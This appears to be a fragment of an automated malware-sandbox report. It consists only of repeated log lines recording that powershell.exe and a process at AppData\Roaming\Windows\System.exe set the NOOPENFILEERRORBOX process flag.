            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
